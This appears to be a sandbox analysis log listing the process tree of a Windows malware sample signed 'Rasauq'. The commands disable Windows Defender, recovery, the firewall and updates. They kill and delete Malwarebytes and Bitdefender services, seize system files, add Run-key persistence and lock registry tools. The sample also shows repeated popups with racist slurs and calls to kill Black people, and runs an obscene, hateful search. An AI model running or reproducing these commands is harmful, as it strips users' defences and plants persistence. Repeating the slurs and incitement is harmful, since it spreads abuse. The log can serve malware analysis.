C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue {default} recoveryenabled4⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\net.exenet stop "SDRSVC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC"5⤵
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net.exenet stop "security center"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"5⤵
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\net.exenet stop "wuauserv"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"5⤵
-
-
-
C:\Windows\system32\net.exenet stop "Windows Defender Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Defender Service"5⤵
-
-
-
C:\Windows\system32\net.exenet stop "Windows Firewall"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Firewall"5⤵
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess5⤵
-
-
-
C:\Windows\system32\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f4⤵
-
-
C:\Windows\system32\reg.exeREG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f4⤵
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableAntiTamper $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\wscsvc.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbam.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MBAMService.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamtray.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamscheduler.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exesc stop MBAMService4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete MBAMService4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop MBAMProtector4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete MBAMProtector4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop MBAMChameleon4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete MBAMChameleon4⤵
-
-
C:\Windows\system32\sc.exesc stop MBAMFarflt4⤵
-
-
C:\Windows\system32\sc.exesc delete MBAMFarflt4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop MBAMSwissArmy4⤵
-
-
C:\Windows\system32\sc.exesc delete MBAMSwissArmy4⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f4⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdservicehost.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdagent.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdredline.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdparentalservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdreinit.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdsubwiz.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM seccenter.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vsserv.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epssecurityservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exesc stop bdservicehost4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete bdservicehost4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bdagent4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete bdagent4⤵
-
-
C:\Windows\system32\sc.exesc stop bdredline4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete bdredline4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bdparentalservice4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete bdparentalservice4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bdreinit4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete bdreinit4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bdsubwiz4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete bdsubwiz4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop seccenter4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete seccenter4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop vsserv4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete vsserv4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop epssecurityservice4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete epssecurityservice4⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete WinDefend4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete SecurityHealthService4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete Sense4⤵
- Launches sc.exe
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MsMpEng.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MpCmdRun.exe /T4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthSystray.exe /T4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM smartscreen.exe /T4⤵
- Kills process with taskkill
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f4⤵
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\notepad.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\calc.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\powercfg.exepowercfg /hibernate off REM Disables hibernation4⤵
- Power Settings
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in4⤵
- Power Settings
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-dc 0 REM Prevents sleep on battery4⤵
- Power Settings
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in4⤵
- Power Settings
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "Device Name"4⤵
- Power Settings
- Checks SCSI registry key(s)
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "USB Root Hub"4⤵
- Power Settings
- Checks SCSI registry key(s)
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f4⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCR\behead all niggers" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f4⤵
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"4⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f4⤵
- Adds Run key to start application
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k4⤵
-
C:\Windows\system32\reg.exereg query "HKU" /s /f "Software" /k5⤵
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\reg.exereg add "End of search: 39 match(es) found.\Software\Rasauq on top" /f4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:3 "This machine has been compromised by Rasuaq"4⤵
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
